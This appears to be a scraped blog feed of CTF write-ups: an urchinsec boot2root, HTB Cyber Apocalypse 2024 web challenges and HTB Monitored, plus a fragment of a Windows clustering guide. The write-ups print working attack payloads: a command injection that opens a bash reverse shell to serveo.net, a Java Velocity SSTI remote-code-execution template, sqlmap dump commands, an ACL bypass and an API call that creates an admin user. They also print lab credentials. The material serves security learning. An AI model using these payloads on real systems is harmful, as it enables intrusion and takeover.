You will also need to set a static iP address for the domain controller server. 3. Create Iscsi disk 1 iSCSI is an IP-based standard for transferring data that supports host access by carrying SCSI commands over IP networks. 4. Iscsi initialization We now need to initialize the disk on both instances\nUse the ip address we set for the DC to discover the iscsi instance.\nThen connect.\nThen go to windows \u0026ldquo;create and formart disk partition\u0026rdquo; application to initialize the disk.\n5. Setup Cluster We are going to setup the cluster. Make sure you login with domain user account in the nodes. If you dont you will get an error when creating the cluster.\nIm creating the cluster in node 1\nChoose you current computer as the cluster server\nThen add the disk that we had created earlier as storage.\n6. Configure cluster quorum Learn more about this \u0026raquo; here\n7. Connect nodes to Cluster Use same steps as in stage 5 to add a node to the cluster\nYou can do this clicking add node in the cluster that we just created in 5\n8. Test cluster If you shutdown on vm the disk become online on the other and vice versa. The status also changes to down or up depending on which node is up.\nThis is a succesful demonstration of setup of hight availability in windows server. This can be applied to lots of services and real time application. 
The one demonstarted above is high availability for storage device.\n","date":"2024-06-21T14:23:40+03:00","image":"https://f0rk3b0mb.github.io/cover/4020769.jpg","permalink":"https://f0rk3b0mb.github.io/p/windows_server_high_availability_cluster/","title":"Windows_server_high_availability_cluster"},{"content":"Writeup for urchinsec 2024 boot2root challenge This is the writeup for the boot 2 root challenge Bill Systems which i got the second solve.\nThis challneg requires knowledge in:\nrecon persistense lateral movement priviledge escalation Bill Systems categoty: boot2root difficulty: medium\nwe are given:\n1 2 3 SCOPE OF ENGAGEMENT domains : *.billsys.urc IP : 45.79.66.97 First we need to gather more info, so i ran an nmap scan to see open ports\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.7 (protocol 2.0) | ssh-hostkey: | 256 9e:cd:9e:38:58:35:4c:24:1a:01:29:0d:9d:26:fe:2b (ECDSA) |_ 256 50:35:25:83:7d:aa:d7:42:43:d4:bb:fa:e8:6c:12:bb (ED25519) 25/tcp filtered smtp 80/tcp open http |_http-title: Site doesn\u0026#39;t have a title (text/plain; charset=utf-8). 
| fingerprint-strings: | FourOhFourRequest: | HTTP/1.0 200 OK | Date: Sat, 27 Apr 2024 12:15:19 GMT | Content-Length: 0 | GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SIPOptions, SSLSessionReq, TLSSessionReq, TerminalServerCookie: | HTTP/1.1 400 Bad Request | Content-Type: text/plain; charset=utf-8 | Connection: close | Request | GetRequest: | HTTP/1.0 200 OK | Date: Sat, 27 Apr 2024 12:15:12 GMT | Content-Length: 0 | HTTPOptions: | HTTP/1.0 200 OK | Date: Sat, 27 Apr 2024 12:15:13 GMT |_ Content-Length: 0 443/tcp open https? 3000/tcp open ppp? | fingerprint-strings: | GenericLines, Help, RTSPRequest: | HTTP/1.1 400 Bad Request | Content-Type: text/plain; charset=utf-8 | Connection: close | Request | GetRequest: | HTTP/1.0 200 OK | Cache-Control: max-age=0, private, must-revalidate, no-transform | Content-Type: text/html; charset=utf-8 | Set-Cookie: i_like_gitea=7748aed9b1afa3fe; Path=/; HttpOnly; SameSite=Lax | Set-Cookie: _csrf=U5NJcsVjX-xLNIhZ6o64wSWiZd86MTcxNDIyMDExMzY5MDg3MDY4Nw; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax | X-Frame-Options: SAMEORIGIN | Date: Sat, 27 Apr 2024 12:15:13 GMT | \u0026lt;!DOCTYPE html\u0026gt; | \u0026lt;html lang=\u0026#34;en-US\u0026#34; data-theme=\u0026#34;gitea-auto\u0026#34;\u0026gt; | \u0026lt;head\u0026gt; | \u0026lt;meta name=\u0026#34;viewport\u0026#34; content=\u0026#34;width=device-width, initial-scale=1\u0026#34;\u0026gt; | \u0026lt;title\u0026gt;Gitea: Git with a cup of tea\u0026lt;/title\u0026gt; | \u0026lt;link rel=\u0026#34;manifest\u0026#34; href=\u0026#34;data:application/json;base64,eyJuYW1lIjoiR2l0ZWE6IEdpdCB3aXRoIGEgY3VwIG9mIHRlYSIsInNob3J0X25hbWUiOiJHaXRlYTogR2l0IHdpdGggYSBjdXAgb2YgdGVhIiwic3RhcnRfdXJsIjoiaHR0cDovL2dpdC5iaWxsc3lzLnVyYy8iLCJpY29ucyI6W3sic3JjIjoiaHR0cDovL2dpdC5iaWxsc3lzLnVyYy9hc3NldHMvaW1nL2xvZ28ucG5nIiwidHlwZSI6ImltYWdlL3BuZyIsInNpem | HTTPOptions: | HTTP/1.0 405 Method Not Allowed | Allow: HEAD | Allow: GET | Cache-Control: max-age=0, private, must-revalidate, 
no-transform | Set-Cookie: i_like_gitea=e41496a78b8b88ad; Path=/; HttpOnly; SameSite=Lax | Set-Cookie: _csrf=vUtLqCC5_VSGwBmhopYmXC6PyWM6MTcxNDIyMDEyMDUyMzg0MjU2Mw; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax | X-Frame-Options: SAMEORIGIN | Date: Sat, 27 Apr 2024 12:15:20 GMT |_ Content-Length: 0 3306/tcp open mysql MariaDB (unauthorized) 3333/tcp open nagios-nsca Nagios NSCA 2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service : ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port80-TCP:V=7.94SVN%I=7%D=4/27%Time=662CEC50%P=x86_64-pc-linux-gnu%r(G SF:etRequest,4B,\u0026#34;HTTP/1\\.0\\x20200\\x20OK\\r\\nDate:\\x20Sat,\\x2027\\x20Apr\\x202 SF:024\\x2012:15:12\\x20GMT\\r\\nContent-Length:\\x200\\r\\n\\r\\n\u0026#34;)%r(HTTPOptions, SF:4B,\u0026#34;HTTP/1\\.0\\x20200\\x20OK\\r\\nDate:\\x20Sat,\\x2027\\x20Apr\\x202024\\x2012: SF:15:13\\x20GMT\\r\\nContent-Length:\\x200\\r\\n\\r\\n\u0026#34;)%r(RTSPRequest,67,\u0026#34;HTTP/1 SF:\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text/plain;\\x20charset SF:=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request\u0026#34;)%r(FourOhF SF:ourRequest,4B,\u0026#34;HTTP/1\\.0\\x20200\\x20OK\\r\\nDate:\\x20Sat,\\x2027\\x20Apr\\x20 SF:2024\\x2012:15:19\\x20GMT\\r\\nContent-Length:\\x200\\r\\n\\r\\n\u0026#34;)%r(GenericLine SF:s,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text/plain SF:;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request SF:\u0026#34;)%r(Help,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20te SF:xt/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x2 SF:0Request\u0026#34;)%r(SSLSessionReq,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nCo SF:ntent-Type:\\x20text/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n 
SF:\\r\\n400\\x20Bad\\x20Request\u0026#34;)%r(TerminalServerCookie,67,\u0026#34;HTTP/1\\.1\\x20400 SF:\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text/plain;\\x20charset=utf-8\\r\\n SF:Connection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request\u0026#34;)%r(TLSSessionReq,67, SF:\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text/plain;\\x20 SF:charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request\u0026#34;)%r( SF:Kerberos,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20tex SF:t/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20 SF:Request\u0026#34;)%r(LPDString,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent SF:-Type:\\x20text/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n4 SF:00\\x20Bad\\x20Request\u0026#34;)%r(LDAPSearchReq,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20R SF:equest\\r\\nContent-Type:\\x20text/plain;\\x20charset=utf-8\\r\\nConnection:\\ SF:x20close\\r\\n\\r\\n400\\x20Bad\\x20Request\u0026#34;)%r(SIPOptions,67,\u0026#34;HTTP/1\\.1\\x204 SF:00\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text/plain;\\x20charset=utf-8\\r SF:\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request\u0026#34;); ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port3000-TCP:V=7.94SVN%I=7%D=4/27%Time=662CEC51%P=x86_64-pc-linux-gnu%r SF:(GenericLines,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x SF:20text/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Ba SF:d\\x20Request\u0026#34;)%r(GetRequest,38A1,\u0026#34;HTTP/1\\.0\\x20200\\x20OK\\r\\nCache-Contr SF:ol:\\x20max-age=0,\\x20private,\\x20must-revalidate,\\x20no-transform\\r\\nCo SF:ntent-Type:\\x20text/html;\\x20charset=utf-8\\r\\nSet-Cookie:\\x20i_like_git SF:ea=7748aed9b1afa3fe;\\x20Path=/;\\x20HttpOnly;\\x20SameSite=Lax\\r\\nSet-Coo SF:kie:\\x20_csrf=U5NJcsVjX-xLNIhZ6o64wSWiZd86MTcxNDIyMDExMzY5MDg3MDY4Nw;\\x 
SF:20Path=/;\\x20Max-Age=86400;\\x20HttpOnly;\\x20SameSite=Lax\\r\\nX-Frame-Opt SF:ions:\\x20SAMEORIGIN\\r\\nDate:\\x20Sat,\\x2027\\x20Apr\\x202024\\x2012:15:13\\x SF:20GMT\\r\\n\\r\\n\u0026lt;!DOCTYPE\\x20html\u0026gt;\\n\u0026lt;html\\x20lang=\\\u0026#34;en-US\\\u0026#34;\\x20data-theme= SF:\\\u0026#34;gitea-auto\\\u0026#34;\u0026gt;\\n\u0026lt;head\u0026gt;\\n\\t\u0026lt;meta\\x20name=\\\u0026#34;viewport\\\u0026#34;\\x20content=\\\u0026#34;widt SF:h=device-width,\\x20initial-scale=1\\\u0026#34;\u0026gt;\\n\\t\u0026lt;title\u0026gt;Gitea:\\x20Git\\x20with\\x SF:20a\\x20cup\\x20of\\x20tea\u0026lt;/title\u0026gt;\\n\\t\u0026lt;link\\x20rel=\\\u0026#34;manifest\\\u0026#34;\\x20href=\\\u0026#34; SF:data:application/json;base64,eyJuYW1lIjoiR2l0ZWE6IEdpdCB3aXRoIGEgY3VwIG SF:9mIHRlYSIsInNob3J0X25hbWUiOiJHaXRlYTogR2l0IHdpdGggYSBjdXAgb2YgdGVhIiwic SF:3RhcnRfdXJsIjoiaHR0cDovL2dpdC5iaWxsc3lzLnVyYy8iLCJpY29ucyI6W3sic3JjIjoi SF:aHR0cDovL2dpdC5iaWxsc3lzLnVyYy9hc3NldHMvaW1nL2xvZ28ucG5nIiwidHlwZSI6Iml SF:tYWdlL3BuZyIsInNpem\u0026#34;)%r(Help,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\n SF:Content-Type:\\x20text/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r SF:\\n\\r\\n400\\x20Bad\\x20Request\u0026#34;)%r(HTTPOptions,197,\u0026#34;HTTP/1\\.0\\x20405\\x20Me SF:thod\\x20Not\\x20Allowed\\r\\nAllow:\\x20HEAD\\r\\nAllow:\\x20GET\\r\\nCache-Cont SF:rol:\\x20max-age=0,\\x20private,\\x20must-revalidate,\\x20no-transform\\r\\nS SF:et-Cookie:\\x20i_like_gitea=e41496a78b8b88ad;\\x20Path=/;\\x20HttpOnly;\\x2 SF:0SameSite=Lax\\r\\nSet-Cookie:\\x20_csrf=vUtLqCC5_VSGwBmhopYmXC6PyWM6MTcxN SF:DIyMDEyMDUyMzg0MjU2Mw;\\x20Path=/;\\x20Max-Age=86400;\\x20HttpOnly;\\x20Sam SF:eSite=Lax\\r\\nX-Frame-Options:\\x20SAMEORIGIN\\r\\nDate:\\x20Sat,\\x2027\\x20A SF:pr\\x202024\\x2012:15:20\\x20GMT\\r\\nContent-Length:\\x200\\r\\n\\r\\n\u0026#34;)%r(RTSPR SF:equest,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text/ 
SF:plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Re SF:quest\u0026#34;); Only ports of interest were 22, 25 , 80 , 3306\non port 80 is bills portfolio other than that there is nothing interesting\nso we try and get the subdomains:\nThere are two subdomains :\ngit.billsys.urc - this is running a local instance of gittea storage.billsys.urc - this is running am instance of tiny file manager On git.billsys.urc we create an account and login. There are other users and repos but the one that sticks out is that of bill.\nIt is source code for a python web app called sesame.\nLooking at the commits we see a sqllite instance database that had been ommited we download it and view contents\ncracking the user hash we get the password\n1 ef92b778bafe771e89245b89ecbc08a44a4e166c06659911881f383d4473e94f : password123 On storage.billsys.urc we are provided with an instance of tiny file manager we also require creds to access it. *\n1 admin : admin@123 Here we can upload files , so i upload a php rev shell\nDropping to the shell we see that we are user \u0026ldquo;http\u0026rdquo;. There is no obvious method of priv esc.\nI was stuck here till i checked the open ports on the machine using netstat.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 127.0.0.54:53 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:5355 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN 38132/python3 tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN - tcp6 0 0 :::5355 :::* LISTEN - tcp6 0 0 :::3306 :::* LISTEN - tcp6 0 0 :::22 :::* LISTEN - tcp6 0 0 :::3000 :::* LISTEN - tcp6 0 0 :::3333 :::* LISTEN - As you see above there is a service on port 80 that is only accessed internally.\nTo access this from our attack box we will need to use a tunnel client like chisel. 
You can get chisel \u0026raquo; here\n1 2 on attackbox \u0026gt;\u0026gt; ./chisel server -p 8000 --reverse on chal machine \u0026gt;\u0026gt; ./chisel client \u0026lt;ip\u0026gt;:8000 R:8001:127.0.0.1:8080 After this we can access the service on port 80 which is the sesame application we got the src earlier.\nOn the sesame applicatiion we login with the creds we found in the sqlite db file.\nIf you read the src this application is used by bill to read files in the server.\nThere is nothing else interesting so i looked through the source code.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 in main.py def dashboard(): if request.method == \u0026#34;GET\u0026#34;: return render_template(\u0026#39;dash.html\u0026#39;) if request.method == \u0026#34;POST\u0026#34;: key = request.form.get(\u0026#34;key\u0026#34;) file_read = request.form.get(\u0026#34;fileread\u0026#34;) check_key = SesameKey.query.filter_by(key=key).first() if check_key is not None: num = 107 stk = chr(num) secret = \u0026#39;\u0026#39;.join([chr(ord(x) ^ ord(stk)) for x in key]) with open(\u0026#34;temp_secret\u0026#34;, \u0026#34;w\u0026#34;) as temp: temp.write(secret) command = f\u0026#34;sudo sesame -i temp_secret -r {file_read}\u0026#34; run = subprocess.check_output(command, shell=True) run = run.decode(\u0026#39;utf-8\u0026#39;) os.system(f\u0026#34;rm -rf temp_secret\u0026#34;) return render_template(\u0026#39;dash.html\u0026#39;, message=\u0026#34;It Works\u0026#34;) else: return render_template(\u0026#39;dash.html\u0026#39;, message=\u0026#34;Wrong Key\u0026#34;) If you look carefully our user input is not being sanitized and it is being put directly to subprocess module. 
Seeing this you immediately think command execution.\nThe catch is that the output of a command you run will not be displayed.\nSo after some trial i created:\n1 key=IpwnEazy@@#TH!ngG5~\u0026amp;fileread=/etc/passwd; bash -c \u0026#34;bash -i \u0026gt;\u0026amp; /dev/tcp/serveo.net/33997 0\u0026gt;\u0026amp;1\u0026#34;\u0026amp;action= This gets us a reverse shell. We are now the user bill. From here i created ssh keys so that i could login via ssh which is better and more stable.\nOur target now us to achieve root.\nRunning sudo -l we can see that our user can run \u0026ldquo;sesame\u0026rdquo; command with sudo rights.\nThis command is used earlier in the python application\n1 2 3 Running : sudo sesame -i temp_secret -r /etc/shadow Note: shadow file is only read by root so with this command we can read files as the root user. 1 2 3 4 5 6 7 8 9 Error: -i is a required argument Usage of sesame: -h\tPrints This Output -i string Input Secret File To Read Secret (-i /path/to/secret.txt) -r string File To Read (-r /path/to/filetoread.txt) -s\tChange Permissions Of Files It also supports changing of file permissions with -s flag.\nSO in order to read the root flag we can exploit this. So after some trial and error i did this\n1 2 3 4 5 6 7 8 9 10 11 12 sudo sesame -i temp_secret -s When it prompts for a file enter ../../../../../../root/. When it prompts for permission 777 This above will make the root permission be rwx by everyone.\n1 . (dot): This refers to the current directory. For example, if you\u0026#39;re in the directory /home/user, then . refers to /home/user. 
From here you can read the root flag\nflag : urchinsec{I_know_CTF_This_S3rV35_IS_we334akK_NEXTTTT}\n","date":"2024-04-28T18:07:14+03:00","image":"https://f0rk3b0mb.github.io/cover/urchinsec.png","permalink":"https://f0rk3b0mb.github.io/p/urchinsec_2024/","title":"Urchinsec_2024"},{"content":"This is the writeup of HTB cyber apocalypse 2024 web challenges.\nI participated with my team \u0026ldquo;Gang de la Sinfonia\u0026rdquo;.\nWeb Category TimeKORP rating: very easy\nHere you are provided with a webpage that has a parameter ?format=%H:%M:%D , from the source code it was running linux date command from that syntax.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 \u0026lt;?php class TimeModel { public function __construct($format) { $this-\u0026gt;command = \u0026#34;date \u0026#39;+\u0026#34; . $format . \u0026#34;\u0026#39; 2\u0026gt;\u0026amp;1\u0026#34;; } public function getTime() { $time = exec($this-\u0026gt;command); $res = isset($time) ? $time : \u0026#39;?\u0026#39;; return $res; } } This is classic command injection.\n1 payload : %H:%M:%D\u0026#39;;cat flag.txt flag: HTB{t1m3_f0r_th3_ult1m4t3_pwn4g3}\nKORP terminal rating: very easy\nFor this challnge you are provided with a login page that requires a username and password. So it has to be login bypass.\nGiven the rating of this challenge just throw sqlmap at it. You can also confirm this by using a single quote ,it return a sql error.\nOutput from slqmap\nFrom this we get a user admin and the password hash.\n1 admin: $2b$12$OF1QqLVkMFUwJrl1J1YG9u6FdAQZa6ByxFt/CkS/2HW8GA563yiv. 1 2 3 hashcat -m 3200 hashcat.txt /usr/share/wordlists/rockyou.txt $2b$12$OF1QqLVkMFUwJrl1J1YG9u6FdAQZa6ByxFt/CkS/2HW8GA563yiv.:password123 Cracking the password using hashcat we get the password : password123\nWe can then login to get the flag\nflag: HTB{t3rm1n4l_cr4ck1ng_sh3n4nig4n5}\nFlag command rating: very easy\nHere we are given an applicating that requires a bunch of commands to navigate a puzzle. 
When you intercept the traffic using burp you will see an endpoint with a list of the commands.\nHere we can see a secret command. Using it\u0026hellip;\nflag: HTB{D3v3l0p3r_t00l5_4r3_b35t_wh4t_y0u_Th1nk??!}\nLabrinth Linguist rating: easy\nHere we are given a webapp that translates text that we give it.\nOooooh its a java application. I wasnt expecting thsi to be straight forward. But \u0026hellip;\n1 2 3 4 5 6 7 String template = \u0026#34;\u0026#34;; try { template = readFileToString(\u0026#34;/app/src/main/resources/templates/index.html\u0026#34;, textString); } catch (IOException e) { e.printStackTrace(); } Our input was being used in a template. This is dangerous if no filters are applied. I quickly googled SSTI in java (Server Side Template Injection) payloads. Got this \u0026raquo; here .\nFrom here we can execute commands and cat the flag. Credits to Anshul for doing this. I had a problem using the payload in burp suite due to the newlines.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 #set($s=\u0026#34;\u0026#34;) #set($stringClass=$s.getClass()) #set($stringBuilderClass=$stringClass.forName(\u0026#34;java.lang.StringBuilder\u0026#34;)) #set($inputStreamClass=$stringClass.forName(\u0026#34;java.io.InputStream\u0026#34;)) #set($readerClass=$stringClass.forName(\u0026#34;java.io.Reader\u0026#34;)) #set($inputStreamReaderClass=$stringClass.forName(\u0026#34;java.io.InputStreamReader\u0026#34;)) #set($bufferedReaderClass=$stringClass.forName(\u0026#34;java.io.BufferedReader\u0026#34;)) #set($collectorsClass=$stringClass.forName(\u0026#34;java.util.stream.Collectors\u0026#34;)) #set($systemClass=$stringClass.forName(\u0026#34;java.lang.System\u0026#34;)) #set($stringBuilderConstructor=$stringBuilderClass.getConstructor()) #set($inputStreamReaderConstructor=$inputStreamReaderClass.getConstructor($inputStreamClass)) #set($bufferedReaderConstructor=$bufferedReaderClass.getConstructor($readerClass)) 
#set($runtime=$stringClass.forName(\u0026#34;java.lang.Runtime\u0026#34;).getRuntime()) #set($process=$runtime.exec(\u0026#34;cat ../flag2023911480.txt\u0026#34;)) #set($null=$process.waitFor() ) #set($inputStream=$process.getInputStream()) #set($inputStreamReader=$inputStreamReaderConstructor.newInstance($inputStream)) #set($bufferedReader=$bufferedReaderConstructor.newInstance($inputStreamReader)) #set($stringBuilder=$stringBuilderConstructor.newInstance()) #set($output=$bufferedReader.lines().collect($collectorsClass.joining($systemClass.lineSeparator()))) $output Just use the payload in the browser and capture the request in burp.\nflag : HTB{f13ry_t3mpl4t35_fr0m_th3_d3pth5!!}\nLocktalk rating: medium\nThis is where things got interesting.\nHere you are given a webapplication with an api blueprint.\nThe api had three routes:\n1 2 3 4 5 /flag protected by middleware /chat/\u0026lt;int:chat_id\u0026gt; protected by middleware /get_ticket open but blocked by ha proxy A quick look at the proxy configuration\n1 2 3 4 5 frontend haproxy bind 0.0.0.0:1337 default_backend backend http-request deny if { path_beg,url_dec -i /api/v1/get_ticket } So we had to find a way to bypass this. I used a lot of time on this part. Until i found this \u0026raquo; here\nTo make your search easier you had to find the ha proxy version from the dockerfile : PS i had forgotten do thsi , it could have made my work easier.\n1 2 3 4 5 6 WORKDIR /tmp RUN wget https://www.haproxy.org/download/2.8/src/haproxy-2.8.1.tar.gz \u0026amp;\u0026amp; \\ tar zxvf haproxy-*.tar.gz \u0026amp;\u0026amp; cd haproxy-* \u0026amp;\u0026amp; \\ make TARGET=linux-musl \u0026amp;\u0026amp; \\ make install RUN rm -rf * From the article if we make a request to /api/v1/get_ticket we get denied but if we make request to /api/v1/get_ticket# we bypass the acl.\nFrom here i gotr the jwt token. I tries common methos of exploiting jwt but none of them worked. 
UNtil i searched for a vulnerability in python_jwt==3.3.3 from the requirements.txt\nI found this vulnerability that enables us to bypass the jwt verification \u0026raquo; here and for the exploit \u0026raquo; here\nWe change our role to administrator and then read the flag\nflag: HTB{h4Pr0Xy_n3v3r_D1s@pp01n4s}\nTestimonial Here we are given a webapplication that accepts parameters customer and testimonial.\nIt is a go webapplication witha grpc endpoint. I saw some people asking on the discord why there were two ip addresses. One if for the main webapp and one was for grpc. Read more about grpc \u0026raquo; here\nIve encountered with grpc before. So the tools we will need are grpcurl and grpcui. In this context grpcui will not work.\n1 grpcurl -plaintext -import-path ./ -proto ptypes.proto -d \u0026#39;{\u0026#34;customer\u0026#34;: \u0026#34;examplecusomer\u0026#34;, \u0026#34;testimonial\u0026#34;: \u0026#34;exampletestimonial\u0026#34;}\u0026#39; 94.237.59.119:45387 RickyService.SubmitTestimonial Above is the format for grpcurl. Breakdown:\nptypes.proto file is in the pb folder . This is used to enable grpcurl to interact with the server since service enumaration was disables . 
This is what caused grpcui not to work.\nThe service and method name can be found in the source code.\nUsing this will also enable you to bypass the filter that was placed in the code\n1 2 3 for _, char := range []string{\u0026#34;/\u0026#34;, \u0026#34;\\\\\u0026#34;, \u0026#34;:\u0026#34;, \u0026#34;*\u0026#34;, \u0026#34;?\u0026#34;, \u0026#34;\\\u0026#34;\u0026#34;, \u0026#34;\u0026lt;\u0026#34;, \u0026#34;\u0026gt;\u0026#34;, \u0026#34;|\u0026#34;, \u0026#34;.\u0026#34;} { customer = strings.ReplaceAll(customer, char, \u0026#34;\u0026#34;) } NOTE: Beyond this point i did after the ctf , i did not solve this one.\nOfficial writeup \u0026raquo; https://github.com/hackthebox/cyber-apocalypse-2024/tree/main/web/%5BEasy%5D%20Testimonial\n","date":"2024-03-11T13:23:40+03:00","image":"https://f0rk3b0mb.github.io/cover/ca2024.png","permalink":"https://f0rk3b0mb.github.io/p/htb_cyberapocalypse_2024/","title":"HTB_cyberapocalypse_2024"},{"content":"HTB monitored Writeup for HTB monitored box\nrated: medium category: web\nNmap Scan\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-28 08:28 EAT Warning: 10.10.11.248 giving up on port because retransmission cap hit (6). Nmap scan report for monitored.htb (10.10.11.248) Host is up (0.36s latency). 
Not shown: 988 closed ports PORT STATE SERVICE VERSION 68/udp open|filtered dhcpc 123/udp open ntp NTP v4 (unsynchronized) | ntp-info: |_ 161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public) | snmp-info: | enterprise: net-snmp | engineIDFormat: unknown | engineIDData: 6f3fa7421af94c6500000000 | snmpEngineBoots: 35 |_ snmpEngineTime: 48m05s | snmp-netstat: | TCP 0.0.0.0:22 0.0.0.0:0 | TCP 0.0.0.0:389 0.0.0.0:0 | TCP 127.0.0.1:25 0.0.0.0:0 |_ UDP 0.0.0.0:68 *:* | snmp-processes: | 1: | | 2: | |_ 3: | snmp-sysdescr: Linux monitored 5.10.0-27-amd64 #1 SMP Debian 5.10.205-2 (2023-12-31) x86_64 |_ System uptime: 48m5.77s (288577 timeticks) |_snmp-win32-software: 162/udp open snmp net-snmp; net-snmp SNMPv3 server | snmp-info: | enterprise: net-snmp | engineIDFormat: unknown | engineIDData: 5a44ab2146ff4c6500000000 | snmpEngineBoots: 26 |_ snmpEngineTime: 48m05s 1100/udp open|filtered mctp 1813/udp open|filtered radacct 3130/udp open|filtered squid-ipc 19500/udp open|filtered unknown 22053/udp open|filtered unknown 27444/udp open|filtered Trinoo_Bcast 44190/udp open|filtered unknown 49259/udp open|filtered unknown Service Info: Host: monitored Host script results: |_clock-skew: 10s Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 1302.38 seconds Snmp enumeration\n1 snmpwalk -v1 -c public monitored.htb we get creds for username: svc pass: XjH7VCehowpR1xZB\nMaking a post request to /api/v1/authenticate we get access token that we can use to login\n1 2 https://nagios.monitored.htb/nagiosxi/index.php?token=1562fdd66ece5a71f970399218ab842b6c8674c0 this nagios is vulnerable to sql injection \u0026raquo; see here\n1 sqlmap -u \u0026#34;https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php\u0026#34; --data=\u0026#34;id=3\u0026amp;action=acknowledge_banner_message\u0026#34; --cookie \u0026#34;nagiosxi=40ka0uvgngmjev8i267hq2qt9p\u0026#34; --dbms=MySQL --level=1 --risk=1 -D nagiosxi -T xi_users --dump Dumping the db enables us to get an admin api key : IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL\nWe can now create our owm user with full privilldeges\n1 curl -XPOST -k \u0026#34;https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=2huuT2u2QIPqFuJHnkPEEuibGJaJIcHCFDpDb29qSFVlbdO4HJkjfg2VpDNE3PEK\u0026amp;pretty=1\u0026#34; -d \u0026#34;username=test\u0026amp;password=test\u0026amp;name=test\u0026amp;email=test@test.com\u0026amp;auth_level=admin\u0026#34; Uploads a reverse shell by creating a command and checking it\nuser.txt 5428c0b228e51f2428525f3faa3fcca2\nTo escalate privilldges we modify the setuid binary npcd\nroot.txt 9893d1d8c72bc11111a49fcb508ac07a\n","date":"2024-02-28T22:44:28+03:00","image":"https://f0rk3b0mb.github.io/cover/htb.svg","permalink":"https://f0rk3b0mb.github.io/p/htb_monitored/","title":"Htb_monitored"},{"content":"HTB surveillance Writeup for htb surveillnace box\nrated: medium category: web\nNmap Scan\n1 2 3 4 5 6 7 8 9 10 11 Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-28 14:38 EAT Nmap scan report for 10.10.11.245 Host is up (0.30s latency). 
